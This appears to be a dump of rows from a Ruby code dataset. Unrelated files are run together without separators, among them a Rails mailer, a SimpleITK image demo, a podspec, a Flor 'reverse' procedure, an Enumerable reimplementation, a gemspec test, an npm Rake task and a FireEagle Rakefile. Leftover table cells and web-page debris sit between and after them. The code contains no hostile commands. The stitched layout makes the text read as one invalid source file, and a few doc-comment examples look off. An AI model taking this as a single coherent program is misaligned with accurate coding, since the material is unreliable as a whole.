class ApplicationMailer < ActionMailer::Base
# Default sender address applied to every mail unless overridden.
default from: '[email protected]'
# Renders mailer views inside the 'mailer' layout.
layout 'mailer'
end
#=========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#=========================================================================

require 'simpleitk'

# Builds a SimpleITK vector of +vector_class+ holding +values+.
def build_vector(vector_class, *values)
  vector = vector_class.new
  values.each { |value| vector << value }
  vector
end

# Blank 128x128 8-bit canvas.
pixel_type = Simpleitk::SitkUInt8
image_size = build_vector(Simpleitk::VectorUInt32, 128, 128)
image = Simpleitk::Image.new(image_size, pixel_type)

# Face: a large Gaussian blob centred on the canvas.
face_size = build_vector(Simpleitk::VectorDouble, 64, 64)
face_center = build_vector(Simpleitk::VectorDouble, 64, 64)
face = Simpleitk.gaussian_source(pixel_type, image_size, face_size, face_center)

# Eyes: two small bright Gaussians subtracted out of the face, which is
# then thresholded to a solid silhouette.
eye_size = build_vector(Simpleitk::VectorDouble, 5, 5)
eye1_center = build_vector(Simpleitk::VectorDouble, 48, 48)
eye2_center = build_vector(Simpleitk::VectorDouble, 80, 48)
eye1 = Simpleitk.gaussian_source(pixel_type, image_size, eye_size, eye1_center, 150)
eye2 = Simpleitk.gaussian_source(pixel_type, image_size, eye_size, eye2_center, 150)
face = Simpleitk.subtract(face, eye1)
face = Simpleitk.subtract(face, eye2)
face = Simpleitk.binary_threshold(face, 200, 255, 255)

# Mouth: a thresholded, inverted Gaussian ellipse.
mouth_radii = build_vector(Simpleitk::VectorDouble, 30, 20)
mouth_center = build_vector(Simpleitk::VectorDouble, 64, 76)
mouth = Simpleitk.gaussian_source(pixel_type, image_size, mouth_radii, mouth_center)
mouth = Simpleitk.binary_threshold(mouth, 200, 255, 255)
mouth = Simpleitk.subtract(255, mouth)

# Paste the mouth onto the face.
mouth_size = build_vector(Simpleitk::VectorUInt32, 64, 18)
mouth_location = build_vector(Simpleitk::VectorInt32, 32, 76)
face = Simpleitk.paste(face, mouth, mouth_size, mouth_location, mouth_location)

# Compose the face onto the canvas and display the result.
image = Simpleitk.add(image, face)
Simpleitk.show(image, "Hello World: Ruby", true)
#
# Be sure to run `pod lib lint YMNetworking.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
# Pod metadata for the YMNetworking module.
s.name = 'YMNetworking'
s.version = '0.1.0'
s.summary = ' YMNetworking.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/ModuleProject/YMNetworking'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'YM' => '[email protected]' }
s.source = { :git => 'https://github.com/ModuleProject/YMNetworking.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
# All implementation files live under Classes; no resource bundle is shipped.
s.source_files = 'YMNetworking/Classes/**/*'
# s.resource_bundles = {
# 'YMNetworking' => ['YMNetworking/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
module ModulePos
# Holds the library's version string.
module Fiscalization
VERSION = "0.1.0"
end
end
# frozen_string_literal: true
class Flor::Pro::Reverse < Flor::Procedure
  #
  # Reverses an array or a string.
  #
  # ```
  # reverse [ 0, 2, 4 ]
  #   # --> sets f.ret to [ 4, 2, 0 ]
  # reverse "melimelo"
  #   # --> sets f.ret to "olemilem"
  # ```
  #
  # Reverses f.ret if there are no arguments:
  # ```
  # [ 5, 6, 4 ]  # sets f.ret to [ 5, 6, 4 ]
  # reverse _    # sets f.ret to [ 4, 6, 5 ]
  # ```
  #
  # Will fail if it finds nothing reversable.
  #
  # # see also
  #
  # shuffle, sort, and sort_by

  name 'reverse'

  def pre_execute
    # Seed the node with the reversed incoming f.ret, then strip
    # unkeyed attribute children so they get evaluated.
    @node['ret'] = receive_payload_ret
    unatt_unkeyed_children
  end

  # Reverses the incoming f.ret when it supports #reverse, else false.
  def receive_payload_ret
    candidate = payload['ret']
    return false unless candidate.respond_to?(:reverse)
    candidate.reverse
  end

  def receive_last
    reversed = @node['ret']
    unless reversed
      fail(Flor::FlorError.new('found no argument that could be reversed', self))
    end
    wrap_reply('ret' => reversed)
  end
end
# depends on: module.rb class.rb
##
# The Enumerable mixin provides collection classes with several traversal
# and searching methods, and with the ability to sort. The class must provide
# a method #each, which yields successive members of the collection. If
# Enumerable#max, #min, or #sort is used, the objects in the collection must
# also implement a meaningful <tt><=></tt> operator, as these methods rely on
# an ordering between members of the collection.
#--
# Just to save you 10 seconds, the reason we always use #each to extract
# elements instead of something simpler is because Enumerable can not assume
# any other methods than #each. If needed, class-specific versions of any of
# these methods can be written *in those classes* to override these.
module Enumerable
class Sort
  # Accepts an optional sorter (a callable, or a symbol/string naming a
  # method) used in place of the built-in quicksort.
  def initialize(sorter = nil)
    @sorter = sorter
  end

  # Sorts +xs+ with the given comparison block (defaults to <=>).
  # The collection must not be mutated while the sort runs.
  def sort(xs, &prc)
    prc = Proc.new { |a, b| a <=> b } unless block_given?

    if @sorter
      @sorter = method(@sorter) unless @sorter.respond_to?(:call)
      @sorter.call(xs, &prc)
    else
      quicksort(xs, &prc)
    end
  end

  alias_method :call, :sort

  # Pairs an element with its precomputed sort key so comparisons only
  # touch the key (Schwartzian transform).
  class SortedElement
    def initialize(val, sort_id)
      @value, @sort_id = val, sort_id
    end

    attr_reader :value, :sort_id

    def <=>(other)
      @sort_id <=> other.sort_id
    end
  end

  # Sorts +xs+ by the keys the block yields for each element.
  def sort_by(xs)
    decorated = xs.map { |element| SortedElement.new(element, yield(element)) }
    sort(decorated).map { |wrapped| wrapped.value }
  end

  ##
  # Simple (unoptimized) quicksort: partition around the first element
  # using group_by, then recurse on the lesser/greater partitions.
  def quicksort(xs, &prc)
    return [] unless xs

    pivot = Undefined
    xs.each { |element| pivot = element; break }
    return xs if pivot.equal?(Undefined)

    partitions = xs.group_by do |element|
      element.equal?(pivot) ? 0 : yield(element, pivot)
    end

    quicksort(partitions[-1], &prc) + partitions[0] + quicksort(partitions[1], &prc)
  end
end
##
# :call-seq:
# enum.to_a => array
# enum.entries => array
#
# Returns an array containing the items in +enum+.
#
# (1..7).to_a #=> [1, 2, 3, 4, 5, 6, 7]
# { 'a'=>1, 'b'=>2, 'c'=>3 }.to_a #=> [["a", 1], ["b", 2], ["c", 3]]
# Builds the array by delegating to #collect, so classes overriding
# #collect automatically affect #to_a as well.
def to_a
collect { |e| e }
end
alias_method :entries, :to_a
##
# :call-seq:
# enum.grep(pattern) => array
# enum.grep(pattern) { | obj | block } => array
#
# Returns an array of every element in +enum+ for which <tt>Pattern ===
# element</tt>. If the optional +block+ is supplied, each matching element
# is passed to it, and the block's result is stored in the output array.
#
# (1..100).grep 38..44 #=> [38, 39, 40, 41, 42, 43, 44]
# c = IO.constants
# c.grep(/SEEK/) #=> ["SEEK_END", "SEEK_SET", "SEEK_CUR"]
# res = c.grep(/SEEK/) { |v| IO.const_get(v) }
# res #=> [2, 0, 1]
def grep(pattern)
  # Collect elements matched by pattern via ===, mapping each through the
  # block when one is given.
  matches = []
  each do |element|
    next unless pattern === element
    matches << (block_given? ? yield(element) : element)
  end
  matches
end
# Returns a fresh Enumerable::Sort instance used by #sort and #sort_by;
# no state is shared between sorts.
def sorter
Enumerable::Sort.new
end
##
# :call-seq:
# enum.sort => array
# enum.sort { | a, b | block } => array
#
# Returns an array containing the items in +enum+ sorted, either according
# to their own <tt><=></tt> method, or by using the results of the supplied
# block. The block should return -1, 0, or +1 depending on the comparison
# between +a+ and +b+. As of Ruby 1.8, the method Enumerable#sort_by
# implements a built-in Schwartzian Transform, useful when key computation
# or comparison is expensive.
#
# %w(rhea kea flea).sort #=> ["flea", "kea", "rhea"]
# (1..10).sort { |a,b| b <=> a} #=> [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
def sort(&prc)
sorter.sort(self, &prc)
end
##
# :call-seq:
# enum.sort_by { | obj | block } => array
#
# Sorts +enum+ using a set of keys generated by mapping the
# values in +enum+ through the given block.
#
# %w{ apple pear fig }.sort_by { |word| word.length}
# #=> ["fig", "pear", "apple"]
#
# The current implementation of sort_by generates an array of tuples
# containing the original collection element and the mapped value. This makes
# sort_by fairly expensive when the keysets are simple
#
# require 'benchmark'
# include Benchmark
#
# a = (1..100000).map {rand(100000)}
#
# bm(10) do |b|
# b.report("Sort") { a.sort }
# b.report("Sort by") { a.sort_by { |a| a} }
# end
#
# produces:
#
# user system total real
# Sort 0.180000 0.000000 0.180000 ( 0.175469)
# Sort by 1.980000 0.040000 2.020000 ( 2.013586)
#
# However, consider the case where comparing the keys is a non-trivial
# operation. The following code sorts some files on modification time
# using the basic sort method.
#
# files = Dir["#"]
# sorted = files.sort { |a,b| File.new(a).mtime <=> File.new(b).mtime}
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This sort is inefficient: it generates two new File objects during every
# comparison. A slightly better technique is to use the Kernel#test method
# to generate the modification times directly.
#
# files = Dir["#"]
# sorted = files.sort { |a,b|
# test(?M, a) <=> test(?M, b)
# }
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This still generates many unnecessary Time objects. A more efficient
# technique is to cache the sort keys (modification times in this case)
# before the sort. Perl users often call this approach a Schwartzian
# Transform, after Randal Schwartz. We construct a temporary array, where
# each element is an array containing our sort key along with the filename.
# We sort this array, and then extract the filename from the result.
#
# sorted = Dir["#"].collect { |f|
# [test(?M, f), f]
# }.sort.collect { |f| f[1] }
# sorted #=> ["mon", "tues", "wed", "thurs"]
#
# This is exactly what sort_by does internally.
#
# sorted = Dir["#"].sort_by { |f| test(?M, f)}
# sorted #=> ["mon", "tues", "wed", "thurs"]
# Delegates to Enumerable::Sort#sort_by, which decorates each element with
# its computed key before sorting (Schwartzian Transform).
def sort_by(&prc)
sorter.sort_by(self, &prc)
end
##
# :call-seq:
# enum.count(item) => int
# enum.count { | obj | block } => int
#
# Returns the number of items in +enum+ for which equals to +item+. If a
# block is given, counts the number of elements yielding a true value.
#
# ary = [1, 2, 4, 2]
# ary.count(2) # => 2
# ary.count{ |x|x%2==0} # => 3
def count(item = Undefined)
  # With an argument, count elements equal to it; otherwise count the
  # elements for which the block is truthy.
  total = 0
  if item.equal?(Undefined)
    each { |element| total += 1 if yield(element) }
  else
    each { |element| total += 1 if item == element }
  end
  total
end
##
# :call-seq:
# enum.detect(ifnone = nil) { | obj | block } => obj or nil
# enum.find(ifnone = nil) { | obj | block } => obj or nil
#
# Passes each entry in +enum+ to +block+>. Returns the first for which
# +block+ is not false. If no object matches, calls +ifnone+ and returns
# its result when it is specified, or returns nil
#
# (1..10).detect { |i| i % 5 == 0 and i % 7 == 0 } #=> nil
# (1..100).detect { |i| i % 5 == 0 and i % 7 == 0 } #=> 35
def find(ifnone = nil)
  # Return the first element for which the block is truthy; otherwise the
  # result of calling +ifnone+ (or nil when no fallback was supplied).
  each do |element|
    return element if yield(element)
  end
  ifnone.call if ifnone
end
alias_method :detect, :find
##
# :call-seq:
# enum.find_index(ifnone = nil) { | obj | block } => int
#
# Passes each entry in +enum+ to +block+. Returns the index for the first
# for which +block+ is not false. If no object matches, returns
# nil.
#
# (1..10).find_index { |i| i % 5 == 0 and i % 7 == 0 } #=> nil
# (1..100).find_index { |i| i % 5 == 0 and i % 7 == 0 } #=> 35
def find_index(ifnone = nil)
  # Track the zero-based position while walking the collection with #each.
  position = -1
  each do |element|
    position += 1
    return position if yield(element)
  end
  ifnone.call if ifnone
end
##
# :call-seq:
# enum.find_all { | obj | block } => array
# enum.select { | obj | block } => array
#
# Returns an array containing all elements of +enum+ for which +block+ is
# not false (see also Enumerable#reject).
#
# (1..10).find_all { |i| i % 3 == 0 } #=> [3, 6, 9]
def find_all
  # Keep every element for which the block returns a truthy value.
  selected = []
  each { |element| selected << element if yield(element) }
  selected
end
alias_method :select, :find_all
##
# :call-seq:
# enum.reject { | obj | block } => array
#
# Returns an array for all elements of +enum+ for which +block+ is false
# (see also Enumerable#find_all).
#
# (1..10).reject { |i| i % 3 == 0 } #=> [1, 2, 4, 5, 7, 8, 10]
def reject
  # Keep every element for which the block returns a falsy value.
  kept = []
  each { |element| kept << element unless yield(element) }
  kept
end
##
# :call-seq:
# enum.collect { | obj | block } => array
# enum.map { | obj | block } => array
#
# Returns a new array with the results of running +block+ once for every
# element in +enum+.
#
# (1..4).collect { |i| i*i } #=> [1, 4, 9, 16]
# (1..4).collect { "cat" } #=> ["cat", "cat", "cat", "cat"]
def collect
  # Map each element through the block; with no block, copy the elements
  # unchanged (mirrors #to_a).
  results = []
  each { |element| results << (block_given? ? yield(element) : element) }
  results
end
alias_method :map, :collect
##
# :call-seq:
# enum.inject(initial) { | memo, obj | block } => obj
# enum.inject { | memo, obj | block } => obj
#
# Combines the elements of +enum+ by applying the block to an accumulator
# value (+memo+) and each element in turn. At each step, +memo+ is set
# to the value returned by the block. The first form lets you supply an
# initial value for +memo+. The second form uses the first element of the
# collection as a the initial value (and skips that element while
# iterating).
#
# Sum some numbers:
#
# (5..10).inject { |sum, n| sum + n } #=> 45
#
# Multiply some numbers:
#
# (5..10).inject(1) { |product, n| product * n } #=> 151200
#
# Find the longest word:
#
# longest = %w[ cat sheep bear ].inject do |memo,word|
# memo.length > word.length ? memo : word
# end
#
# longest #=> "sheep"
#
# Find the length of the longest word:
#
# longest = %w[ cat sheep bear ].inject(0) do |memo,word|
# memo >= word.length ? memo : word.length
# end
#
# longest #=> 5
def inject(memo = Undefined)
  # When no initial value is supplied the first element seeds the memo and
  # is skipped by the block; an empty collection folds to nil.
  each do |element|
    memo = memo.equal?(Undefined) ? element : yield(memo, element)
  end
  memo.equal?(Undefined) ? nil : memo
end
##
# :call-seq:
# enum.partition { | obj | block } => [ true_array, false_array ]
#
# Returns two arrays, the first containing the elements of +enum+ for which
# the block evaluates to true, the second containing the rest.
#
# (1..6).partition { |i| (i&1).zero?} #=> [[2, 4, 6], [1, 3, 5]]
def partition
  # Split into [elements where the block is truthy, the rest], preserving
  # #each order within both halves.
  matched = []
  unmatched = []
  each { |element| (yield(element) ? matched : unmatched) << element }
  [matched, unmatched]
end
##
# :call-seq:
# enum.group_by { | obj | block } => a_hash
#
# Returns a hash, which keys are evaluated result from the block, and values
# are arrays of elements in +enum+ corresponding to the key.
#
# (1..6).group_by { |i| i%3} #=> {0=>[3, 6], 1=>[1, 4], 2=>[2, 5]}
def group_by
  # Map each block result (key) to the array of elements that produced it;
  # elements within a group keep their #each order.
  # (Also removes an unused local `i` left over in the previous version.)
  groups = {}
  each do |o|
    key = yield(o)
    (groups[key] ||= []) << o
  end
  groups
end
##
# :call-seq:
# enum.first => obj or nil
# enum.first(n) => an_array
#
# Returns the first element, or the first +n+ elements, of the enumerable.
# If the enumerable is empty, the first form returns nil, and the second
# form returns an empty array.
def first(n = nil)
  # Without +n+: the first element (nil when empty). With +n+: up to the
  # first n elements as an array. Negative n is rejected.
  raise ArgumentError, "Invalid number of elements given." if n && n < 0
  taken = []
  each do |element|
    return element unless n
    return taken if taken.size == n
    taken << element
  end
  n ? taken : nil
end
# :call-seq:
# enum.all? => true or false
# enum.all? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block never returns false or nil. If the block is not
# given, Ruby adds an implicit block of <tt>{ |obj| obj }</tt> (that is all?
# will return true only if none of the collection members are
# false or nil.)
#
# %w[ant bear cat].all? { |word| word.length >= 3} #=> true
# %w[ant bear cat].all? { |word| word.length >= 4} #=> false
# [ nil, true, 99 ].all? #=> false
def all?
  # False as soon as any element (or block result) is falsy; true for the
  # empty collection.
  each do |element|
    verdict = block_given? ? yield(element) : element
    return false unless verdict
  end
  true
end
##
# :call-seq:
# enum.any? [{ |obj| block } ] => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block ever returns a value other than false or nil. If
# the block is not given, Ruby adds an implicit block of <tt>{ |obj| obj
# }</tt> (that is any? will return true if at least one of the collection
# members is not false or nil.
#
# %w[ant bear cat].any? { |word| word.length >= 3} #=> true
# %w[ant bear cat].any? { |word| word.length >= 4} #=> true
# [ nil, true, 99 ].any? #=> true
def any?(&prc)
  # Defaults to testing element truthiness when no block is given.
  prc ||= Proc.new { |obj| obj }
  each { |element| return true if prc.call(element) }
  false
end
##
# :call-seq:
# enum.one? => true or false
# enum.one? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block returns true exactly once. If the block is not
# given, one? will return true only if exactly one of the collection members
# are true.
#
# %w[ant bear cat].one? { |word| word.length == 4} #=> true
# %w[ant bear cat].one? { |word| word.length > 4} #=> false
# [ nil, true, 99 ].one? #=> false
def one?(&prc)
  # Defaults to testing element truthiness when no block is given.
  prc = Proc.new { |obj| obj } unless block_given?
  matches = 0
  each do |o|
    next unless prc.call(o)
    matches += 1
    # A second match settles the answer, so stop iterating early.
    return false if matches > 1
  end
  matches == 1
end
##
# :call-seq:
# enum.none? => true or false
# enum.none? { |obj| block } => true or false
#
# Passes each element of the collection to the given block. The method
# returns true if the block never returns true for all elements. If the
# block is not given, none? will return true only if any of the collection
# members is true.
#
# %w{ant bear cat}.none? { |word| word.length == 5} #=> true
# %w{ant bear cat}.none? { |word| word.length >= 4} #=> false
# [ nil, true, 99 ].none? #=> false
def none?(&prc)
  # Defaults to testing element truthiness when no block is given.
  prc = Proc.new { |obj| obj } unless block_given?
  # Short-circuit on the first truthy result instead of counting them all;
  # the returned value is unchanged.
  each { |o| return false if prc.call(o) }
  true
end
##
# :call-seq:
# enum.min => obj
# enum.min { | a,b | block } => obj
#
# Returns the object in +enum+ with the minimum value. The first form
# assumes all objects implement Comparable; the second uses the block to
# return <tt>a <=> b</tt>.
#
# a = %w[albatross dog horse]
# a.min #=> "albatross"
# a.min { |a,b| a.length <=> b.length } #=> "dog"
def min(&prc)
  # Comparison defaults to <=>; nil comparisons are an error.
  prc = Proc.new { |a, b| a <=> b } unless block_given?
  smallest = Undefined
  each do |o|
    if smallest.equal?(Undefined)
      smallest = o
      next
    end
    ordering = prc.call(o, smallest)
    raise ArgumentError, "comparison of #{o.class} with #{smallest} failed" if ordering.nil?
    smallest = o if ordering < 0
  end
  smallest.equal?(Undefined) ? nil : smallest
end
##
# :call-seq:
# enum.max => obj
# enum.max { |a,b| block } => obj
#
# Returns the object in +enum+ with the maximum value. The first form
# assumes all objects implement Comparable; the second uses the block to
# return <tt>a <=> b</tt>.
#
# a = %w[albatross dog horse]
# a.max #=> "horse"
# a.max { |a,b| a.length <=> b.length } #=> "albatross"
def max(&prc)
  # Comparison defaults to <=>; nil comparisons are an error.
  prc = Proc.new { |a, b| a <=> b } unless block_given?
  largest = Undefined
  each do |o|
    if largest.equal?(Undefined)
      largest = o
      next
    end
    ordering = prc.call(o, largest)
    raise ArgumentError, "comparison of #{o.class} with #{largest} failed" if ordering.nil?
    largest = o if ordering > 0
  end
  largest.equal?(Undefined) ? nil : largest
end
##
# :call-seq:
#   enum.min_by { |obj| block } => obj
#
# Passes every element to the block and returns the element whose block
# value is smallest when compared with <tt><=></tt>.  Ties are won by the
# element that #each yields first.  Returns nil for an empty collection.
#
#    a = %w[albatross dog horse]
#    a.min_by { |x| x.length }   #=> "dog"
def min_by()
  best, best_key = Undefined, Undefined
  each do |element|
    key = yield(element)
    # Strictly-greater comparison means an equal key never displaces the
    # element seen earlier, preserving first-wins tie behaviour.
    if best.equal?(Undefined) || (best_key <=> key) > 0
      best, best_key = element, key
    end
  end
  best.equal?(Undefined) ? nil : best
end
##
# :call-seq:
#   enum.max_by { | obj| block } => obj
#
# Passes every element to the block and returns the element whose block
# value is largest when compared with <tt><=></tt>.  Ties are won by the
# element that #each yields first.  Returns nil for an empty collection.
#
#    a = %w[albatross dog horse]
#    a.max_by { |x| x.length }   #=> "albatross"
def max_by()
  best, best_key = Undefined, Undefined
  each do |element|
    key = yield(element)
    # Strictly-less comparison means an equal key never displaces the
    # element seen earlier, preserving first-wins tie behaviour.
    if best.equal?(Undefined) || (best_key <=> key) < 0
      best, best_key = element, key
    end
  end
  best.equal?(Undefined) ? nil : best
end
# :call-seq:
#   enum.include?(obj) => true or false
#   enum.member?(obj)  => true or false
#
# Returns true if any member of +enum+ equals +obj+. Equality is tested
# using #== (with +obj+ as the receiver).
#
#    IO.constants.include? "SEEK_SET"          #=> true
#    IO.constants.include? "SEEK_NO_FURTHER"   #=> false
def include?(obj)
  found = false
  each do |element|
    if obj == element
      found = true
      break
    end
  end
  found
end
alias_method :member?, :include?
##
# :call-seq:
#   enum.each_with_index { |obj, i| block } -> enum
#
# Calls +block+ with two arguments, the item and its index, for
# each item in +enum+.  Returns the receiver.
#
#    hash = {}
#    %w[cat dog wombat].each_with_index { |item, index|
#      hash[item] = index
#    }
#
#    p hash   #=> {"cat"=>0, "wombat"=>2, "dog"=>1}
def each_with_index
  index = 0
  each do |item|
    yield(item, index)
    index += 1
  end
  self
end
##
# :call-seq:
#   enum.zip(arg, ...)                  => array
#   enum.zip(arg, ...) { |arr| block }  => nil
#
# Converts any arguments to arrays, then merges elements of +enum+ with
# corresponding elements from each argument. This generates a sequence of
# enum#size +n+-element arrays, where +n+ is one more than the count of
# arguments. If the size of any argument is less than enum#size, nil values
# are supplied. If a block is given, it is invoked for each output array and
# nil is returned; otherwise an array of arrays is returned.
#
#    a = [ 4, 5, 6 ]
#    b = [ 7, 8, 9 ]
#
#    (1..3).zip(a, b)      #=> [[1, 4, 7], [2, 5, 8], [3, 6, 9]]
#    "cat\ndog".zip([1])   #=> [["cat\n", 1], ["dog", nil]]
#    (1..3).zip            #=> [[1], [2], [3]]
def zip(*args)
  args = args.map { |a| a.to_a }
  if block_given?
    # Yield each tuple as it is built and retain nothing: the previous
    # implementation accumulated the complete result array even though it
    # was discarded when a block was supplied.
    each_with_index do |o, i|
      yield(args.inject([o]) { |tuple, a| tuple << a[i] })
    end
    nil
  else
    result = []
    each_with_index do |o, i|
      # Indexing past the end of a shorter argument yields nil, padding
      # the tuple as documented.
      result << args.inject([o]) { |tuple, a| tuple << a[i] }
    end
    result
  end
end
end
| 28.332869 | 79 | 0.552967 |
038ed5f78e31787f4302c9b6b05d00ab5d5c2599 | 732 | require File.dirname(__FILE__) + '/test_helper'
# Shoulda-style Test::Unit tests for Jeweler::GemSpecHelper: verifies the
# derived gemspec path and that #write produces a valid gemspec file on disk.
class TestGemspec < Test::Unit::TestCase
  context "A Jeweler::GemSpec, given a gemspec" do
    setup do
      @spec = build_spec
      @helper = Jeweler::GemSpecHelper.new(@spec, File.dirname(__FILE__))
    end

    should 'have sane gemspec path' do
      assert_equal "test/#{@spec.name}.gemspec", @helper.path
    end
  end

  context "Jeweler::GemSpec#write" do
    setup do
      @spec = build_spec
      @helper = Jeweler::GemSpecHelper.new(@spec)
      # Remove any gemspec left over from a previous run so the assertion
      # below cannot be satisfied by a stale file.
      FileUtils.rm_f(@helper.path)
      @helper.write
    end

    should "create gemspec file" do
      # File.exists? was deprecated for years and removed in Ruby 3.2;
      # File.exist? is the supported spelling.
      assert File.exist?(@helper.path)
    end

    should "make valid spec" do
      assert @helper.valid?
    end
  end
end
| 22.181818 | 73 | 0.650273 |
b9a16618ff5f56ade398737b2143677b3d527fff | 279 | namespace :npm do
desc 'exec `npm install`'
task :install do
puts system('npm install')
end
desc 'exec `npm run build`'
task build: ['install'] do
puts system('npm run build')
end
end
# Make `npm:build` a prerequisite of Rails' `assets:precompile` so the npm
# bundle is built before asset precompilation runs.
Rake::Task['assets:precompile'].enhance(['npm:build']) do
  # Enhance block: runs after assets:precompile completes; currently a no-op.
end
| 17.4375 | 57 | 0.648746 |
b9d234534c998ca74bb46e11fdb7e4b5dca224f7 | 2,537 | require 'fireeagle/version'
# --- Gem metadata consumed by the Hoe block below ---
AUTHOR = 'Jesse Newland'  # can also be an array of Authors
EMAIL = "[email protected]"
DESCRIPTION = "Ruby wrapper for Yahoo!'s FireEagle"
GEM_NAME = 'fireeagle' # what ppl will type to install your gem
RUBYFORGE_PROJECT = 'fireeagle' # The unix name for your project
HOMEPATH = "http://#{RUBYFORGE_PROJECT}.rubyforge.org"
DOWNLOAD_PATH = "http://rubyforge.org/projects/#{RUBYFORGE_PROJECT}"
# RubyForge credentials: @config is populated lazily by #rubyforge_username,
# which also overwrites RUBYFORGE_USERNAME's string in place.
@config_file = "~/.rubyforge/user-config.yml"
@config = nil
RUBYFORGE_USERNAME = "unknown"
# Lazily loads the RubyForge user config (memoized in @config) and copies the
# configured username into RUBYFORGE_USERNAME via String#replace, so earlier
# references to the constant observe the update.  If the config file cannot
# be read or parsed, prints setup instructions and exits the whole process
# (the bare rescue swallows the underlying error — NOTE(review): intentional
# here, but it hides parse errors as well as missing files).
def rubyforge_username
  unless @config
    begin
      @config = YAML.load(File.read(File.expand_path(@config_file)))
    rescue
      puts <<-EOS
ERROR: No rubyforge config file found: #{@config_file}
Run 'rubyforge setup' to prepare your env for access to Rubyforge
 - See http://newgem.rubyforge.org/rubyforge.html for more details
      EOS
      exit
    end
  end
  # Assumes the YAML document has a "username" key — TODO confirm schema.
  RUBYFORGE_USERNAME.replace @config["username"]
end
# REV is an optional source-control revision appended to the gem version.
REV = nil
# UNCOMMENT IF REQUIRED:
# REV = `svn info`.each {|line| if line =~ /^Revision:/ then k,v = line.split(': '); break v.chomp; else next; end} rescue nil
# Full version string, e.g. "1.2.3" or "1.2.3.456" when REV is set.
VERS = FireEagle::VERSION::STRING + (REV ? ".#{REV}" : "")
# Options handed to RDoc when generating the API documentation.
RDOC_OPTS = ['--quiet', '--title', 'fireeagle rdoc',
             "--opname", "index.html",
             "--line-numbers",
             "--main", "README",
             "--inline-source"]
# Hoe is re-opened to strip its implicit self-dependency ('hoe') from the
# extra runtime dependencies, so the generated gemspec does not depend on hoe.
class Hoe
  # Removes any dependency whose name is 'hoe' (mutating @extra_deps) and
  # returns the remaining dependency list.
  def extra_deps
    @extra_deps.delete_if { |dep| Array(dep).first == 'hoe' }
    @extra_deps
  end
end
# Generate all the Rake tasks
# Run 'rake -T' to see list of generated tasks (from gem root directory)
hoe = Hoe.new(GEM_NAME, VERS) do |p|
p.developer(AUTHOR, EMAIL)
p.description = DESCRIPTION
p.summary = DESCRIPTION
p.url = HOMEPATH
p.rubyforge_name = RUBYFORGE_PROJECT if RUBYFORGE_PROJECT
p.test_globs = ["test/**/test_*.rb"]
p.clean_globs |= ['**/.*.sw?', '*.gem', '.config', '**/.DS_Store'] #An array of file patterns to delete on clean.
# == Optional
p.changes = p.paragraphs_of("History.txt", 0..1).join("\n\n")
p.extra_deps = [ ['oauth', '>= 0.2.1'], ['hpricot', '>= 0.6'], ['GeoRuby', '>= 1.3.2'] ] # An array of rubygem dependencies [name, version], e.g. [ ['active_support', '>= 1.3.1'] ]
#p.spec_extras = {} # A hash of extra values to set in the gemspec.
end
# Changelog excerpt used by the announce tasks.  Note the escaped "\\n\\n"
# joins with literal backslash-n sequences, not newlines — presumably
# intentional for the announce formatting; verify against the announce task.
CHANGES = hoe.paragraphs_of('History.txt', 0..1).join("\\n\\n")
# rsync target on RubyForge: the project root when the gem shares the
# project's name, otherwise a project/gem subdirectory.
PATH = (RUBYFORGE_PROJECT == GEM_NAME) ? RUBYFORGE_PROJECT : "#{RUBYFORGE_PROJECT}/#{GEM_NAME}"
hoe.remote_rdoc_dir = File.join(PATH.gsub(/^#{RUBYFORGE_PROJECT}\/?/,''), 'rdoc')
hoe.rsync_args = '-av --delete --ignore-errors'
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.